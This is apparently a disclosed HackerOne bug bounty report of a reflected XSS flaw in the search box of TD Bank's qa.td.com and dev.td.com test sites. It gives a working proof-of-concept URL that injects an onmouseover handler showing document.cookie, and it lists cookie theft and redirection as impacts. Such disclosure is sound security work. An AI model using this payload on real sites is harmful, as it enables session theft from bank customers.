Lucene search
AllenshajiH1:1861545HistoryFeb 03, 2023 - 5:09 p.m.
TD Bank: Search input is vulnerable for XSS in qa.td.com and dev.td.com
2023-02-0317:09:44
allenshaji
hackerone.com
10
td bank
search input vulnerability
xss
qa.td.com
dev.td.com
exploit
hacker
malicious codes
victim's browser
redirect
malicious website
cookies
bug bounty
Summary:
I was able to exploit search input in qa.td.com.
Steps To Reproduce:
Go to qa.td.com and use the search option to reproduce this vulnerability
Supporting Material/References:
{F2152622}
- [attachment / reference]
Example- https://qa.td.com/ca/en/personal-banking/search?query=test<i>test</i><a onmouseover="alert(document.cookie)"> xxs link</a>&source=1
Impact
- Hacker can execute malicious codes in victimβs browser
- Hacker can redirect user to malicious website
- Hacker can steal victimβs cookies etc.